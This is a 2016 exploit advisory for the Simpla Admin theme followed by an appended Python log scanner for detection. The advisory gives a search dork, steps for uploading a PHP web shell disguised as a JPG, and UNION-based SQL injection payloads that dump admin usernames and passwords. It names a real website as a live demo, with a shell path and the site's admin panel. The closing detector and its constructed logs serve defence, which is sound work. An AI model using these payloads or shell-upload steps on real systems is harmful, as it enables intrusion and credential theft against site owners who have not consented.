xBADGIRL21

Simpla Admin Single-adsID SQL Injection / Shell Upload

Jul 9th, 2016
######################
# Exploit Title : Simpla Admin Single-adsID SQL Injection / Shell Upload
# Exploit Author : xBADGIRL21
# Dork : intext:connexion "single-ads.php?ID=" or inurl:.single-ads.php?ID=
# Software link : https://themeforest.net/item/simpla-admin-flexible-user-friendly-admin-skin/46073
# Category : [ Webapps ]
# Tested on : [ Windows ]
# Vendor : https://themeforest.net
# Version : 1.02
# skype : xbadgirl21
# Date : 2016-07-07
# Video Proof : https://youtu.be/Ouy8h6G9Pyo
######################
#
######################
# Shell Upload #
######################
# Description :
# This shell upload exploit allows attackers to upload their shell easily by registering on the website,
# then choosing "Edit your info" and uploading the shell as shell.jpg, then changing it to shell.php using Live HTTP Headers
# Path Ev!l : /common/uploaded_files/user
# PoC :
# 1 - Choose a site and open it
# 2 - Register on the website
# 3 - Upload your shell as a JPG image, then change it to PHP using Live HTTP Headers
# 4 - Go to : /common/uploaded_files/user/[RANDOM_NUMshell.php]
#######################
#
# Live Demo : http://www.labouteillealamer.fr/common/uploaded_files/user/1467918685a.php
#
######################
# SQL injection #
######################
# PoC :
# http://www.site.com/single-ads.php?ID=[SQLi]
######################
+ test:=> http://www.site.com/single-ads.php?ID=[5830] INJECT HERE
######################
+ CODES :
# http://www.site.com/single-ads.php?ID=-5830 /*!11111union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 --
# http://www.site.com/single-ads.php?ID=single-ads.php?ID=-5830 /*!11111union*/ select 1,2,3,/*!11111group_coNcat(AdminUserName,0x3a,AdminPassword)*/,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from lbm_admin--
+ Demo :
+ http://www.labouteillealamer.fr/single-ads.php?ID=5830'
+ Admin Panel :
+ http://www.labouteillealamer.fr/lbmbackoffice/
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanian Hackers - NoWhere
#######################
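Added here as a defender's example and not part of the original advisory: a Python scan over constructed access-log lines that flags the two indicators this writeup describes, non-numeric or keyword-bearing values in the single-ads.php ID parameter (including the /*!11111union*/ versioned-comment trick) and script files being requested under /common/uploaded_files/user/. The log lines, client IPs and the upload file name are constructed; only the paths and query pattern come from the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache common log format). The client IPs
# and the upload file name are made up; the paths come from the advisory above.
SAMPLE_LOG = """\
203.0.113.5 - - [09/Jul/2016:10:00:01 +0000] "GET /single-ads.php?ID=5830 HTTP/1.1" 200 8123
203.0.113.5 - - [09/Jul/2016:10:00:07 +0000] "GET /single-ads.php?ID=5830' HTTP/1.1" 500 512
203.0.113.5 - - [09/Jul/2016:10:00:20 +0000] "GET /single-ads.php?ID=-5830%20/*!11111union*/%20select%201,2,3 HTTP/1.1" 200 9001
198.51.100.9 - - [09/Jul/2016:10:05:00 +0000] "GET /common/uploaded_files/user/1467000000x.jpg HTTP/1.1" 200 4096
198.51.100.9 - - [09/Jul/2016:10:05:30 +0000] "POST /common/uploaded_files/user/1467000000x.php HTTP/1.1" 200 77
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# MySQL executes the body of a /*!NNNNN ... */ comment, so unwrap it instead of stripping it.
VERSIONED_COMMENT_RE = re.compile(r"/\*!\d*\s*(.*?)\*/", re.DOTALL)
SQL_KEYWORD_RE = re.compile(r"\b(union|select|group_concat|from)\b", re.IGNORECASE)
UPLOAD_DIR = "/common/uploaded_files/user/"
SCRIPT_EXTS = (".php", ".php3", ".php4", ".php5", ".phtml", ".phar")


def check_request(target: str) -> list[tuple[str, str]]:
    """Return (rule, detail) findings for one request target (path + query)."""
    findings = []
    parts = urlsplit(target)
    if parts.path.endswith("/single-ads.php"):
        # parse_qs URL-decodes, so %20 and + are already spaces here.
        for raw in parse_qs(parts.query, keep_blank_values=True).get("ID", []):
            value = VERSIONED_COMMENT_RE.sub(r" \1 ", raw)
            # ID is an integer record key in this app: anything else is a probe.
            if not value.strip().lstrip("-").isdigit():
                findings.append(("sqli-nonnumeric-id", raw))
            if SQL_KEYWORD_RE.search(value):
                findings.append(("sqli-keyword", value))
    name = parts.path.lower()
    # The upload directory should only serve images; a script extension anywhere in the name (x.php, x.php.jpg) is a hit.
    if name.startswith(UPLOAD_DIR) and any(ext in name for ext in SCRIPT_EXTS):
        findings.append(("webshell-path", parts.path))
    return findings


def scan_log(text: str) -> list[tuple[int, str, str, str]]:
    """Apply check_request to every line; returns (line_no, ip, rule, detail)."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:  # skip lines that are not well-formed request records
            continue
        for rule, detail in check_request(m.group("target")):
            hits.append((line_no, m.group("ip"), rule, detail))
    return hits
```

Requests to the upload directory with a script extension are the stronger signal: the ID probes show the attempt, a 200 on a .php file under /common/uploaded_files/user/ shows the upload succeeded.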